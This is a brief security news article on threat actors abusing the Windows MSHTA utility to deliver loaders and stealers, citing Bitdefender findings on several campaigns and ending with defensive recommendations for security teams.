Internet Explorer May Be Dead, but Its Ghost Still Runs Malware

Legacy Windows utilities like Microsoft HTML Application Host (MSHTA) have long been classified as living‑off‑the‑land binaries, or LOLbins, because they are signed, preinstalled, and capable of executing scripts without raising immediate alarms. Although Internet Explorer reached end‑of‑life in 2022, its supporting components persist to maintain backward compatibility for enterprise workflows. This built‑in trust makes MSHTA an attractive drop point for malicious code, allowing threat actors to run VBScript or JavaScript payloads directly from memory, sidestepping many endpoint protections that focus on unsigned executables.

Recent Bitdefender findings reveal a sophisticated evolution in MSHTA abuse. Attackers deploy CountLoader and Emmenhtal Loader chains that masquerade as legitimate software installers or Discord phishing messages, often embedding malicious commands behind fake CAPTCHA prompts. They also exploit SEO‑poisoned webpages and domains ending in .vg or .gl—such as explorer.vg and ccleaner.gl—to host HTA files that fetch secondary payloads like LummaStealer or Amatera. In the PurpleFox campaign, MSHTA is used to pull MSI files disguised as PNG images, enabling a rootkit‑enabled backdoor capable of persistence, data exfiltration, and DDoS attacks.

For security teams, the resurgence of MSHTA underscores the need to broaden detection beyond traditional malware signatures. Monitoring for anomalous MSHTA executions, especially those launched from uncommon directories or paired with PowerShell obfuscation, can surface hidden attack vectors. Organizations should also enforce strict application allowlists, scrutinize outbound connections to newly registered TLDs, and educate users about the risks of downloading software from unverified sources. As legacy tools continue to be weaponized, proactive threat hunting and behavioral analytics will be essential to mitigate the silent threat posed by Windows’ own utilities.